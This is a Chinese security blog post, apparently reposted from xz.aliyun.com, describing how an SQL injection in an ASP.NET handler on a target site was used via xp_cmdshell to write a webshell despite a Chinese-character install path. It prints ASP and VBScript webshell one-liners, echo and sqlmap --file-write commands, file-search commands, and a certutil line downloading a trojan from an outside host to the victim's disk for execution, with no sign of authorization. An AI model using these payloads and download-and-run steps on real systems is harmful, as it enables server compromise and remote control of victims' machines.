SQLserver写Webshell总结 - 突破中文路径

admin 2021年10月20日13:12:20评论754 views字数 1402阅读4分40秒阅读模式

更多全球网络安全资讯尽在邑安全

背景
目标站:

SQLserver写Webshell总结 - 突破中文路径

发现授权文件,刷新抓包得到一处ajax请求指向了TicketsSellMainHandler.ashx文件

SQLserver写Webshell总结 - 突破中文路径

SQLserver写Webshell总结 - 突破中文路径

存在注入

SQLserver写Webshell总结 - 突破中文路径

开始踩坑

本来打算通过注入开启XP_cmdshell提权拿到源码 进一步进行审计
通过dir命令得到该站绝对路径

SQLserver写Webshell总结 - 突破中文路径

发现是中文绝对路径,这个时候在不考虑powershell上线的方式用echo进行写马已经行不通了
mssql调用cmd默认是gb2312编码,使用sqlmap进行echo写马其编码是UTF-8

SQLserver写Webshell总结 - 突破中文路径

powershell上线
尝试powershell上线,发现该服务器存在360,上线失败,暂不考虑bypass

SQLserver写Webshell总结 - 突破中文路径

使用BAT文件写shell
尝试使用sqlmap自带的命令--file-write写bat文件getshell
这里知道了mssql调用cmd的编码是gb2312 所以本地的bat文件编码也要是gb2312

SQLserver写Webshell总结 - 突破中文路径

将本地1.bat文件利用windows的certutil文件写到对方D盘的1c.bat

SQLserver写Webshell总结 - 突破中文路径

type看看中文是否乱码

SQLserver写Webshell总结 - 突破中文路径

没有乱码,但是在接下来运行bat文件中又踩坑了==
多次测试都发现asp的木马中 % 文件跟bat不兼容
在本机中测试 发现木马被写成了这个样==

SQLserver写Webshell总结 - 突破中文路径

期间尝试过没有%的木马

<SCRIPT language=VBScript runat=”server”>execute request(“MH”)</SCRIPT>
但是由于该机器的配置原因都失败
遂放弃

手工写shell
将sqlmap代理到burp 抓echo写马的数据包

SQLserver写Webshell总结 - 突破中文路径

将这段hex通过UTF-8解码

SQLserver写Webshell总结 - 突破中文路径

没有乱码,同理,如果通过GB2312解码一定会乱码,mssql调用cmd使用的便是GB2312编码
将echo xxx 通过GB2313 hex编码

SQLserver写Webshell总结 - 突破中文路径

对比之前UTF-8和GB2313编码的不同

SQLserver写Webshell总结 - 突破中文路径

将burp中原来UTF-8编码的hex改为GB2313编码的hex 然后Forward

SQLserver写Webshell总结 - 突破中文路径

这次没有提示找不到路径 访问该shell写入成功

certutil下载上线

SQLserver写Webshell总结 - 突破中文路径
SQLserver写Webshell总结 - 突破中文路径

与sqlmap --file-write 同理,使用certutil.exe远程下载木马到对方D盘
然后start运行即可

总结
查找文件
1、dir/s/b d:1.txt
2、for /r "D:" %i in (*.ashx) do echo %i
3、%windir%system32inetsrvappcmd list VDIR

写shell
1、powershell上线
2、echo <%eval request("z")%> > d:测试版本z.asp
3、写bat文件,bat编码需要更改为gb2312简体中文。--file-write c:usersxiudesktop1.bat -file-dest d:1c.bat
4、certutil.exe -urlcache -split -f 
http://xxxx.com/1.asp D:1.txt 远程下载shell、木马

原文来自: xz.aliyun.com

原文链接: https://xz.aliyun.com/t/10375

欢迎收藏并分享朋友圈,让五邑人网络更安全

SQLserver写Webshell总结 - 突破中文路径

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!


推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 



原文始发于微信公众号(邑安全):SQLserver写Webshell总结 - 突破中文路径

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月20日13:12:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQLserver写Webshell总结 - 突破中文路径https://cn-sec.com/archives/590226.html

发表评论

匿名网友 填写信息